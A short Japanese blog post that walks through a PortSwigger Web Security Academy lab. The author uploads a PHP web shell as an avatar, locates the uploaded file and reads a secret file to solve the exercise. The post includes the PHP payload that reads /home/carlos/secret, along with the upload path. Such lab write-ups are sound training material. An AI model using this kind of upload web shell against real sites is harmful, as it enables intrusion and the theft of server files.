Shikata Ga Nai

Private? There is no such things.

Remote code execution via web shell uploadをやってみた。

Hello there, ('ω')ノ

 

Webシェルアップロードによるリモートコード実行を。

まずは、ログインして。

 

f:id:ThisIsOne:20220101093902p:plain

 

テスト用の悪意のあるファイルを作成しておいてからアップロードして。

exploit.php

 <?php echo file_get_contents('/home/carlos/secret'); ?>

 

f:id:ThisIsOne:20220101094239p:plain

 

正常にavatarsの下にアップロードできたようで。

 

f:id:ThisIsOne:20220101094302p:plain

 

ソースコードからどこにアップロードされたかを確認して。

 /files/avatars/exploit.php

 

f:id:ThisIsOne:20220101094408p:plain

 

アップロードされたファイルに直接アクセスするとPHPが実行されて。

 https://aca41fec1ef0e0fbc03ff741004f009f.web-security-academy.net/files/avatars/exploit.php

 

f:id:ThisIsOne:20220101094624p:plain

 

取得したコードを入力すると。

 mHtjk1Weh4weDq7xyCMXSrtwONX05CKt

 

f:id:ThisIsOne:20220101094710p:plain

 

クリアできて。

 

f:id:ThisIsOne:20220101094733p:plain

 

Best regards, (^^ゞ